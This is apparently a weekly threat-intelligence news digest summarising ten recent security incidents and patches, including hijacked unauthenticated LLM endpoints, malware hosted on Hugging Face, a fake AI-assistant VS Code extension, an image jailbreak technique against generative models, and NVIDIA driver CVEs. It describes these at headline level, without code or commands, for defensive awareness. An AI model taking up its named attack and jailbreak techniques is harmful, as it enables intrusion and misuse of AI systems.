In a digital bazaar where everything is for sale, threat actors are trading far more than goods - Operation Bizarre Bazaar, led by the hacker alias Hecker, hijacked roughly 35,000 AI system sessions to siphon compute resources. In parallel, adversaries are abusing the Hugging Face platform to distribute thousands of polymorphic Android malware variants. Extending the abuse of trusted platforms, malicious Google search ads targeting “mac cleaner” queries are redirecting users to weaponized landing pages that execute obfuscated shell commands. Keep reading further.
01
The Operation Bizarre Bazaar campaign, led by a hacker alias Hecker, recorded ~35,000 AI system compromise sessions to steal compute resources and resell access via silver.inc, exploiting unprotected LLM endpoints without authentication.
02
Threat actors are abusing the Hugging Face platform to host and distribute thousands of polymorphic Android malware variants via a dropper app called TrustBastion, which uses Accessibility Services to steal credentials and exfiltrate data.
03
A fraudulent ClawdBot Agent VS Code extension impersonated a legitimate AI assistant while silently installing a weaponized ScreenConnect remote access tool that phones home to attacker infrastructure, with multiple fallback loaders to ensure persistence.
04
Offensive researchers released Swarmer, a tool exploiting forgotten Windows Offline Registry APIs and mandatory user profiles to achieve stealthy persistence that avoids common EDR API hooks.
05
A new “semantic chaining” attack technique was described that leverages generative AI model behavior to create image jailbreaks, highlighting emerging AI-centric exploitation vectors in cybersecurity.
06
Suspicious Google search ads for “mac cleaner” and similar queries redirected to harmful landing pages that run obfuscated shell commands, enabling remote code execution and potential malware installation on macOS devices.
07
Google disrupted the IPIDEA residential proxy network infrastructure that used trojanized Android apps and Windows binaries (connected to BadBox 2.0 malware) to mask malicious traffic for credential theft, botnet control, and more.
08
A malicious update was distributed through MicroWorld’s eScan antivirus update infrastructure, deploying a multi-stage downloader that alters registry and update configs, requiring manual remediation to restore proper eScan functionality and block C2 domains.
09
SolarWinds released patches for critical web help desk vulnerabilities (affecting service desk products) that could be exploited for RCE or privilege escalation, urging immediate customer updates.
10
NVIDIA patched four high-severity vulnerabilities (CVE-2025-33217, CVE-2025-33218, CVE-2025-33219, CVE-2025-33220) in its GPU Display Driver and vGPU software that could enable code execution, privilege escalation, DoS, and information disclosure on Windows and Linux systems.
